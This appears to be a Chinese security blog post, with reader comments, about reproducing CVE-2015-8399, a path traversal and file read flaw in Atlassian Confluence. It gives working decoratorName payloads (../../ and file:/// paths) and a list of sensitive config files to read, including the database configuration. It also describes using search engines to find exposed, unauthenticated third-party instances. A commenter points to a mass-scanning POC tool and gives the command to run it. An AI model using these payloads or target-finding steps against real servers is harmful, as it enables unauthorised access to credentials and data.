有关Atlassian Confluence信息泄露漏洞的尝试

描述:
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。

Atlassian Confluence 5.8.17之前版本中存在安全,该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件没有充分过滤'decoratorName'参数。远程攻击者可利用该漏洞读取配置文件。

以上内容:
http://www.cnnvd.org.cn/vulnerability/show/cv_id/2016010311
参考:
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8399

恰好之前本地有一套Confluence的环境,于是就测试了一番:

默认情况下,访问spaces/viewdefaultdecorator.action是需要一个用户登录的;
admin/viewdefaultdecorator.action 特么还需要是管理员登录,特么都管理员,我们就不搞读文件了。

本地验证:
1. decoratorName= 什么都没有
no.jpg
这个时候访问的是:
\Atlassian\Confluence\confluence\WEB-INF\classes
2. decoratorName=.
/spaces/viewdefaultdecorator.action?decoratorName=.
dd.jpg
这时候访问的是:
\Atlassian\Confluence\lib
3. decoratorName=../../
2d.jpg
Atlassian\Confluence\confluence  网页程序目录
根据CVE的描述,
远程攻击者可利用该漏洞读取配置文件,比如WEB-INF/web.xml
web.jpg
看上面../../都可以跳目录了.

4. decoratorName=../../../
3d.jpg
报错了。
..//..// ../..//../ 尝试了都没有出去别的目录。

不会真的如https://www.exploit-db.com/exploits/39170/
所说,只能读读配置文件吧:
/WEB-INF/decorators.xml
/WEB-INF/glue-config.xml
/WEB-INF/server-config.wsdd
/WEB-INF/sitemesh.xml
/WEB-INF/urlrewrite.xml
/WEB-INF/web.xml
/databaseSubsystemContext.xml
/securityContext.xml
/services/statusServiceContext.xml
com/atlassian/confluence/security/SpacePermission.hbm.xml
com/atlassian/confluence/user/OSUUser.hbm.xml
com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
com/atlassian/confluence/user/ConfluenceUser.hbm.xml

其实在本地的环境验证发现还可以使用file
5. decoratorName=file:///c:/  我本地环境是windows
fw.jpg
数据库的配置文件:
http://ip:28090/spaces/viewdefaultdecorator.action?decoratorName=file:///d:/Atlassian/Application Data/Confluence/confluence.cfg.xml
my.jpg

在搜索引擎搜索 “Powered by Atlassian Confluence 面板”
还是可以找到不需要登录的,比如:
某个叫上市公司的某个部门
trs.jpg
某个办公软件的厂商的测试环境
yongyo.jpg

附注:linux环境由于运行用户权限的限制,不是root,读取不了某些文件的。

本地测试的环境Atlassian Confluence 5.1.4 windows server 2003

最后还是那一句:
本人不仅菜,而且还脸皮厚,还请大牛不吝指正。

感谢(0)
分享到: 0
  1. 1# 纷纭 (:-)) | 2016-05-07 17:01

    66666666~

  2. 2# _Thorns (舍就是得。) | 2016-05-07 18:25

    66666666~

  3. 3# xyntax | 2016-05-07 18:26

    赞!POC已加入全家桶
    有的站可以file:///读文件,这样危害就大了

    微信截图_20160507174440.png

    git clone https://github.com/Xyntax/POC-T.git

    python POC-T.py -T -m confluence-file-read -f [path/targetfile] -t [thread-num]

  4. 4# f4ckbaidu (<wtf>) | 2016-05-07 18:28

    66666666

  5. 5# Sura、Rain | 2016-05-07 18:33

    很赞

  6. 6# 刺刺 | 2016-05-07 18:56

    这个系统估计在内网会比较多一点。

  7. 7# obanions | 2016-05-07 21:19

    你这是登录以后读的吧?

  8. _Evil () | 2016-05-08 00:11

    666

  9. _Evil () | 2016-05-08 00:12

    昨天遇到Jenkens和Rails框架的Rendme

阅读更多
个人分类: java-hack
上一篇Sogli长短短的Xssjs-20160506备份手册
下一篇WSC、JSRAT and WMI Backdoor
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭
关闭